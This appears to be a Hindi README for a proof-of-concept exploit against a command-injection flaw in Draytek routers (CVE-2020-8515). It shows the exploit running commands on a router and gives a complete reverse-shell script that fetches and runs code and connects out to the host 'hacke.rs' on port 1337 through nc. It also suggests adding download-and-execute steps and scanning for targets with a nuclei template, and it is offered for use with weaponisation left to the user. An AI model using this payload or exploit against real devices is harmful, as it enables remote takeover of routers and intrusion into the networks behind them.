
CVE-2020-8515 में Draytek राउटर में कमांड इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। इसमें स्वचालित शोषण, रिवर्स शेल डिलीवरी, और nuclei स्कैनिंग टेम्पलेट्स के साथ एकीकरण शामिल है।
मेरे पास पड़ा हुआ Draytek CVE-2020-8515 PoC।
मजेदार बात यह है कि इंजेक्ट किया गया कमांड दो बार निष्पादित होता है, यहाँ देखें:
$ ./draytek.py draytek.local
(>) executing command: cat /etc/passwd
(+) vulnerable!
(>) executing command: uname -a
Linux Vigor3900 2.6.33.5 #1 Wed Mar 28 00:49:28 CST 2018 armv6l unknown
Linux Vigor3900 2.6.33.5 #1 Wed Mar 28 00:49:28 CST 2018 armv6l unknown
मेरी कुछ योजनाएँ थीं इसे अच्छी तरह से तैयार करने की, लेकिन ईमानदारी से कहूँ तो, एक साल बाद भी मुझे याद नहीं कि वे योजनाएँ क्या थीं, तो यह लो। इसमें wget/chmod/exec जोड़ना मुश्किल नहीं है, बस "do_stuff" फंक्शन में देखें।
अगर आप wget से डाउनलोड करके निम्नलिखित स्क्रिप्ट चलाते हैं, तो आपको एक रिवर्स शेल मिलता है:
#!/bin/sh
HOST="hacke.rs"
PORT=1337
rm -f /tmp/a; mkfifo /tmp/a; nc $HOST $PORT 0</tmp/a | /bin/sh >/tmp/a 2>&1; rm /tmp/a
मुझे लगता है कि आप शायद ऐसी स्क्रिप्ट को इकोलोड भी कर सकते हैं अगर आप इंजेक्शन में खराब कैरेक्टर से बच सकें, शायद मैं बाद में जोड़ूँ - डबल-एक्सीक्यूशन समस्या इसे थोड़ा कठिन बनाती है। अभी के लिए, यह आधा-अधूरा है, "उपयोगकर्ता तय करे"।
यह एक्सप्लॉइट असली दुनिया में ज्यादा नुकसान नहीं पहुंचाएगा, इसके प्रति संवेदनशील सभी बॉक्स शायद पहले ही स्क्रिप्ट किडीज के DDoS बॉटनेट द्वारा कब्जा कर लिए गए हैं।
स्कैनिंग के लिए: किसी ने बनाया nuclei टेम्पलेट का उपयोग करें।